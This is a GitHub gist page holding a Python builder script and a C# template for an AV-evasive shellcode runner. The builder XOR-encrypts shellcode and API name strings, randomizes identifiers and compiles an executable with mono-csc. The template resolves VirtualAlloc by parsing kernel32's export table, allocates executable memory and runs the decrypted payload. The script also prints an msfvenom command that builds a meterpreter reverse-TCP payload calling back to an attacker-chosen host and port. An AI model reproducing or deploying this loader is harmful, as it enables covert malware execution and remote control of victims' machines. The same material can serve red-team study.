Skip to content

Instantly share code, notes, and snippets.

@snovvcrash
Last active Oct 3, 2022
Embed
What would you like to do?
Dynamic shellcode runner based on @xpn's example: https://blog.xpnsec.com/weird-ways-to-execute-dotnet/
#!/usr/bin/env python3
import re, os, sys
from random import randint, choices
from string import ascii_lowercase, ascii_uppercase, digits
def xor(input, key):
output = []
for i in range(len(input)):
try:
c = ord(input[i])
except TypeError:
c = input[i]
k = key[i % len(key)]
output.append(c ^ ord(k))
return f'{{ 0x{",0x".join(hex(x)[2:] for x in output)} }};'
def get_random_string(n):
while True:
s = ''.join(choices(ascii_lowercase + ascii_uppercase + digits, k=n))
if not s[0].isdigit():
return s
print(''' _
___| |_ ___ _ _ ___ ___ ___ ___
|_ -| | _| | | | | -_| _|
|___|_|_|_| |___|_|_|_|_|___|_|
Shellcode Runner by @snovvcrash\n''')
with open('template.cs', 'r') as fd:
template = fd.read()
try:
with open('shellcode.bin', 'rb') as fd:
shellcode = fd.read()
except FileNotFoundError:
print("[-] No 'shellcode.bin' file found!")
print('[*] Example: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin')
sys.exit(1)
print("[*] Encrypting shellcode.bin bytes")
key = get_random_string(randint(8, 12))
template = re.sub('BUF;', f'byte[] VAR032 = new byte[{len(shellcode)}] {xor(shellcode, key)}', template)
template = re.sub('BUF_KEY', key, template)
print("[*] Encrypting 'kernel32.dll' string")
key = get_random_string(randint(8, 12))
template = re.sub('KERNEL32;', xor('kernel32.dll', key), template)
template = re.sub('KERNEL32_KEY', key, template)
print("[*] Encrypting 'VirtualAlloc' string")
key = get_random_string(randint(8, 12))
template = re.sub('VIRTUALALLOC;', xor('VirtualAlloc', key), template)
template = re.sub('VIRTUALALLOC_KEY', key, template)
print("[*] Randomizing variable names")
for i in range(999):
var = get_random_string(randint(5, 9))
template = re.sub(f'VAR{str(i).zfill(3)}', var, template)
if i == 117:
namespace = var
with open('shrunner.cs', 'w') as fd:
fd.write(template)
cmd = 'mono-csc /t:winexe /out:shrunner.exe shrunner.cs'
print(f"[*] Compiling with '{cmd}'")
if os.system(cmd) == 0:
print('[+] Done!')
print(f'[*] Entrypoint: {namespace},Program,Main')
#os.remove('shrunner.cs')
os.system('file shrunner.exe')
else:
print('[-] Compilation failed, probably Mono is not installed :(')
print('[*] Install with: sudo apt install mono-devel')
using System;
using System.Text;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace VAR117
{
public class Program
{
[UnmanagedFunctionPointer(CallingConvention.Winapi)]
delegate IntPtr VAR001(IntPtr VAR002, uint VAR003, uint VAR004, uint VAR005);
[UnmanagedFunctionPointer(CallingConvention.Winapi)]
delegate IntPtr VAR006();
static IntPtr VAR007(IntPtr VAR008, string VAR009)
{
var VAR010 = Marshal.PtrToStructure<VAR011>(VAR008);
var VAR012 = Marshal.PtrToStructure<VAR013>(VAR008 + VAR010.VAR014 + 4 + Marshal.SizeOf<VAR015>());
var VAR016 = Marshal.PtrToStructure<VAR017>(VAR008 + (int)VAR012.VAR018.VAR019);
for (int VAR020 = 0; VAR020 < VAR016.VAR021; VAR020++)
{
var VAR022 = Marshal.ReadInt32(VAR008 + (int)VAR016.VAR023 + (VAR020 * 4));
var VAR024 = Marshal.PtrToStringAnsi(VAR008 + (int)VAR022);
if (VAR024 == VAR009)
{
var VAR025 = Marshal.ReadInt32(VAR008 + (int)VAR016.VAR026 + (VAR020 * 4));
return VAR008 + (int)VAR025;
}
}
return IntPtr.Zero;
}
static string VAR027(byte[] VAR028, string VAR029)
{
var VAR030 = new StringBuilder();
for (int VAR020 = 0; VAR020 < VAR028.Length; VAR020++)
VAR030.Append((char)((uint)VAR028[VAR020] ^ (uint)VAR029[VAR020 % VAR029.Length]));
return VAR030.ToString();
}
static byte[] VAR031(byte[] VAR032, string VAR029)
{
var VAR030 = new byte[VAR032.Length];
for (int VAR020 = 0; VAR020 < VAR032.Length; VAR020++)
VAR030[VAR020] = (byte)(VAR032[VAR020] ^ (byte)VAR029[VAR020 % VAR029.Length]);
return VAR030;
}
public static void Main()
{
BUF;
var VAR033 = VAR031(VAR032, "BUF_KEY");
byte[] VAR118 = KERNEL32;
var VAR119 = VAR027(VAR118, "KERNEL32_KEY");
byte[] VAR034 = VIRTUALALLOC;
var VAR009 = VAR027(VAR034, "VIRTUALALLOC_KEY");
IntPtr VAR035 = IntPtr.Zero;
foreach (ProcessModule VAR036 in Process.GetCurrentProcess().Modules)
if (VAR036.ModuleName.ToLower() == VAR119)
VAR035 = VAR007(VAR036.BaseAddress, VAR009);
var VAR037 = Marshal.GetDelegateForFunctionPointer<VAR001>(VAR035);
var VAR038 = VAR037(IntPtr.Zero, (uint)VAR033.Length, 0x3000, 0x40);
Marshal.Copy(VAR033, 0, VAR038, VAR033.Length);
var VAR039 = Marshal.GetDelegateForFunctionPointer<VAR006>(VAR038);
VAR039();
}
#region Structs
[StructLayout(LayoutKind.Sequential, Pack = 1)]
struct VAR013
{
public UInt16 VAR040;
public Byte VAR041;
public Byte VAR042;
public UInt32 VAR043;
public UInt32 VAR044;
public UInt32 VAR045;
public UInt32 VAR046;
public UInt32 VAR047;
public UInt64 VAR048;
public UInt32 VAR049;
public UInt32 VAR050;
public UInt16 VAR051;
public UInt16 VAR052;
public UInt16 VAR053;
public UInt16 VAR054;
public UInt16 VAR055;
public UInt16 VAR056;
public UInt32 VAR057;
public UInt32 VAR058;
public UInt32 VAR059;
public UInt32 VAR060;
public UInt16 VAR061;
public UInt16 VAR062;
public UInt64 VAR063;
public UInt64 VAR064;
public UInt64 VAR065;
public UInt64 VAR066;
public UInt32 VAR067;
public UInt32 VAR068;
public VAR084 VAR018;
public VAR084 VAR069;
public VAR084 VAR070;
public VAR084 VAR071;
public VAR084 VAR072;
public VAR084 VAR073;
public VAR084 VAR074;
public VAR084 VAR075;
public VAR084 VAR076;
public VAR084 VAR077;
public VAR084 VAR078;
public VAR084 VAR079;
public VAR084 VAR080;
public VAR084 VAR081;
public VAR084 VAR082;
public VAR084 VAR083;
}
[StructLayout(LayoutKind.Sequential)]
struct VAR084
{
public UInt32 VAR019;
public UInt32 VAR085;
}
[StructLayout(LayoutKind.Sequential)]
struct VAR017
{
public UInt32 VAR086;
public UInt32 VAR087;
public UInt16 VAR088;
public UInt16 VAR089;
public UInt32 VAR090;
public UInt32 VAR091;
public UInt32 VAR092;
public UInt32 VAR021;
public UInt32 VAR026;
public UInt32 VAR023;
public UInt32 VAR093;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
struct VAR015
{
public UInt16 VAR094;
public UInt16 VAR095;
public UInt32 VAR087;
public UInt32 VAR096;
public UInt32 VAR097;
public UInt16 VAR098;
public UInt16 VAR086;
}
[StructLayout(LayoutKind.Sequential)]
struct VAR011
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]
public char[] VAR099;
public UInt16 VAR100;
public UInt16 VAR101;
public UInt16 VAR102;
public UInt16 VAR103;
public UInt16 VAR104;
public UInt16 VAR105;
public UInt16 VAR106;
public UInt16 VAR107;
public UInt16 VAR108;
public UInt16 VAR109;
public UInt16 VAR110;
public UInt16 VAR111;
public UInt16 VAR112;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public UInt16[] VAR113;
public UInt16 VAR114;
public UInt16 VAR115;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public UInt16[] VAR116;
public Int32 VAR014;
}
#endregion
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment